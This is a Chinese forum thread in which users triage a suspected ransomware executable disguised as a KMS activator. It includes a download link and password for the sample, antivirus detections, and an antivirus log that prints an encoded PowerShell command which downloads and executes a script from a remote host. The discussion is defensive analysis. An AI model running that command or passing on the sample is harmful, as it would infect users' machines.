疑似伪装成kms的勒索病毒

显示全部楼层 · 发表于 2022-6-13 22:36:16

本帖最后由 bananas12138 于 2022-6-14 19:45 编辑

https://bananas12138.lanzouf.com/iw9ZP06d14pa
密码:hi0v
exe文件
前段时间就有人说在微当下载站下载的heu kms有问题
昨天有个群友也碰上了
微当上三个kms仅有两个可以下载，而且只有这一个被火绒扫出来，卡巴落地杀
图片源自“病毒吧”和“勒索病毒吧”
我能力有限，尝试下载运行了上面的kms，没办法复现
ps：看到有不少人中招了
编辑：看了下受害者描述，大概是延时触发（？），而且虚拟机双击的时候启动了powershell.exe，微步云分析：通过创建计划任务实现定时启动，但是另外一个kms没有这个进程
不知道是不是因为版本问题

最新：火绒拦截（06.14 19:45）

防护项目：利用PowerShell执行可疑脚本
执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBpAHAALgBzAGUAYQByAGMAaABuAG8AdwBtAC4AYwBsAHUAYgAnACkAKQA=
操作结果：已允许

进程ID：792
操作进程：C:\Windows\System32\svchost.exe
操作进程命令行：C:\Windows\system32\svchost.exe -k netsvcs -p
父进程ID：708
父进程：C:\Windows\System32\services.exe
父进程命令行：C:\Windows\system32\services.exe

显示全部楼层 · 发表于 2022-6-13 22:38:44

BD：potentially unwanted application
Detection name: Gen:Variant.Application.Graftor.747926

显示全部楼层 · 发表于 2022-6-13 22:39:33

显示全部楼层 · 发表于 2022-6-13 22:42:55

aboringman 发表于 2022-6-13 22:39

有没有办法确定存不存在勒索行为呢？

显示全部楼层 · 发表于 2022-6-13 22:46:47

本帖最后由 aboringman 于 2022-6-13 23:21 编辑

bananas12138 发表于 2022-6-13 22:42
有没有办法确定存不存在勒索行为呢？

虚拟机里跑一下就知道了。

https://www.virustotal.com/gui/f ... 8e34862dd?nocache=1

我越来越觉得他就是KMS。。。。。。微步上也没有出现跟勒索相关的操作。。。。。。

显示全部楼层 · 发表于 2022-6-13 22:50:45

本帖最后由 bananas12138 于 2022-6-13 22:54 编辑

aboringman 发表于 2022-6-13 22:46
虚拟机里跑一下就知道了。

看卡巴和ESET的报法，这货不像是PUA，应该是真的Malware。

虚拟机没有跑出来不知道其他kms有没有这种情况，这个双击的时候启动了powershell.exe
微步云：通过创建计划任务实现定时启动

显示全部楼层 · 发表于 2022-6-13 22:58:45

咖啡RP，但无法处理要求联系客服（智障设计）

显示全部楼层 · 发表于 2022-6-13 23:11:57

onedrive 发表于 2022-6-13 22:58
咖啡RP，但无法处理要求联系客服（智障设计）

Norton power eraser：你再骂

显示全部楼层 · 发表于 2022-6-13 23:15:08

没发现加密行为

显示全部楼层 · 发表于 2022-6-13 23:18:25

huangzihang 发表于 2022-6-13 07:11
Norton power eraser：你再骂

NPE应急嘛，但是咖啡这个扫描是右键嘞，设计成这样就很反人类

[可疑文件] 疑似伪装成kms的勒索病毒

本帖子中包含更多资源

本帖子中包含更多资源